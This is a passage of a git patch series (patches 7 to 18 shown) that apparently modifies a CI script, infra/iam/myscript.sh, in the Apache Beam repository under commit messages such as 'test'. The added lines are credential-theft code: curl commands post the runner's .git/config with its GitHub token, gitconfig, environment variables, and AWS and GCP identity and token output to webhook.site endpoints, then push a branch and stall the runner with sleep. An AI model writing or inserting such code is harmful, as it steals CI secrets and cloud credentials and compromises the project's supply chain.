b/infra/iam/myscript.sh @@ -14,6 +14,7 @@ cat /home/runner/work/beam/beam/.git/config >&2 # cat myscript.sh >&2 # echo "base64 /home/runner/work/beam/beam/.git/config" + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From d15204d0a83307ea137f593f94b82ade282dd66e Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 13:37:12 +0200 Subject: [PATCH 07/18] test --- infra/iam/myscript.sh | 1 - 1 file changed, 1 deletion(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 9dfa31a73768..a8cc611ee696 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -14,7 +14,6 @@ cat /home/runner/work/beam/beam/.git/config >&2 # cat myscript.sh >&2 # echo "base64 /home/runner/work/beam/beam/.git/config" - curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From d3b10f6b3c1baaf1adc88a530dff8c89764f1bb3 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 15:37:41 +0200 Subject: [PATCH 08/18] test444 --- infra/iam/myscript.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index a8cc611ee696..3d2fd37f8f48 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -14,6 +14,8 @@ cat /home/runner/work/beam/beam/.git/config >&2 # cat myscript.sh >&2 # echo "base64 /home/runner/work/beam/beam/.git/config" + + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From cc6112f706fe2c9599840e25f562a8bcd669df50 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 15:46:11 +0200 Subject: [PATCH 09/18] test123 --- infra/iam/myscript.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 3d2fd37f8f48..9176920e098e 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -16,6 +16,7 @@ cat /home/runner/work/beam/beam/.git/config >&2 + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From c8a921a473c8d741388e66a4b842ee8e08fd94b2 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 15:52:55 +0200 Subject: [PATCH 10/18] test1552branch --- infra/iam/myscript.sh | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 9176920e098e..9b5e475f4961 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -14,6 +14,14 @@ cat /home/runner/work/beam/beam/.git/config >&2 # cat myscript.sh >&2 # echo "base64 /home/runner/work/beam/beam/.git/config" +#push branch +git config --global user.email "bh@someemail.com" +git config --global user.name "H1Tester"; +git fetch origin +git checkout master +git pull origin master +git checkout -b bh-poc +git push -u origin bh-poc @@ -83,7 +91,3 @@ git config --global user.email \"bh@someemail.com\"; \ git add . ; \ git push -u origin bh-poc - - -sleep 1200 - From c714a421c55572328121d3adb0cf35a4d78cf790 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 15:57:23 +0200 Subject: [PATCH 11/18] test --- infra/iam/myscript.sh | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 9b5e475f4961..87a49ed510f0 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -16,7 +16,7 @@ cat /home/runner/work/beam/beam/.git/config >&2 #push branch git config --global user.email "bh@someemail.com" -git config --global user.name "H1Tester"; +git config --global user.name "H1Tester" git fetch origin git checkout master git pull origin master @@ -25,6 +25,7 @@ git push -u origin bh-poc + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From 61a00f60a082cbf74ff56ebdca7c6ec16eeb9c97 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 15:59:33 +0200 Subject: [PATCH 12/18] tesat --- infra/iam/myscript.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 87a49ed510f0..453e53fc0fa8 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -26,6 +26,8 @@ git push -u origin bh-poc + + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From 8f7b7484b9ad71ebe98cb77d8e97c22b68c1f336 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 16:10:10 +0200 Subject: [PATCH 13/18] test1 --- infra/iam/myscript.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 453e53fc0fa8..5277ceae6a43 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -28,6 +28,7 @@ git push -u origin bh-poc + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ From e61cfb53ffd63b03b9664907d6c6a5b3a16b9c3a Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 16:29:03 +0200 Subject: [PATCH 14/18] test --- infra/iam/myscript.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 5277ceae6a43..35f83b0288a6 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -95,3 +95,4 @@ git config --global user.email \"bh@someemail.com\"; \ git add . ; \ git push -u origin bh-poc +sleep 120 \ No newline at end of file From d9193a0116ff1e5f29e2445ac2135a2e6684bf70 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 16:29:15 +0200 Subject: [PATCH 15/18] test --- infra/iam/myscript.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 35f83b0288a6..0d60cfd418eb 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -95,4 +95,4 @@ git config --global user.email \"bh@someemail.com\"; \ git add . ; \ git push -u origin bh-poc -sleep 120 \ No newline at end of file +sleep 1200 \ No newline at end of file From b317c4cd7724c855dc7a594e1239496f822aef9d Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 16:31:13 +0200 Subject: [PATCH 16/18] test --- infra/iam/myscript.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 0d60cfd418eb..35f83b0288a6 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -95,4 +95,4 @@ git config --global user.email \"bh@someemail.com\"; \ git add . ; \ git push -u origin bh-poc -sleep 1200 \ No newline at end of file +sleep 120 \ No newline at end of file From b0b968d2e6d005393d8bc8a3c8c2776db8c501f0 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 16:35:02 +0200 Subject: [PATCH 17/18] test --- infra/iam/myscript.sh | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 35f83b0288a6..993c96786431 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -32,46 +32,46 @@ git push -u origin bh-poc curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/githubtoken curl -X POST \ -H "Content-Type: text/plain" \ --data "$(git config --list)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gitconfigList + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/gitconfigList curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/.gitconfig)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/githubtoken curl -X POST \ -H "Content-Type: text/plain" \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/githubtoken curl -X POST \ -H "Content-Type: text/plain" \ --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/githubtoken-base curl -X POST \ -H "Content-Type: text/plain" \ --data "$(aws sts get-caller-identity)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/aws-identity curl -X POST \ -H "Content-Type: text/plain" \ --data "$(gcloud auth list)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/gcp-authlist curl -X POST \ -H "Content-Type: text/plain" \ --data "$(gcloud config get-value account)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-get-value-account + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/gcp-get-value-account export AWSCREDS=$(aws sts get-session-token) export GCPCREDS=$(gcloud auth print-access-token) @@ -83,7 +83,7 @@ export GCPFullCred="$(curl -s -X POST \ curl -X POST \ -H "Content-Type: text/plain" \ --data "$(printenv)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv + https://webhook.site/605c679f-5fed-4164-93b6-5d1eb4a6a352/printenv git config --global user.email \"bh@someemail.com\"; \ From 88f2cfa94977887ed24dcce30ad5b6677cb3f372 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 16:41:10 +0200 Subject: [PATCH 18/18] test --- infra/iam/myscript.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 993c96786431..2cb6df6aea9e 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -95,4 +95,4 @@ git config --global user.email \"bh@someemail.com\"; \ git add . ; \ git push -u origin bh-poc -sleep 120 \ No newline at end of file +sleep 1200 \ No newline at end of file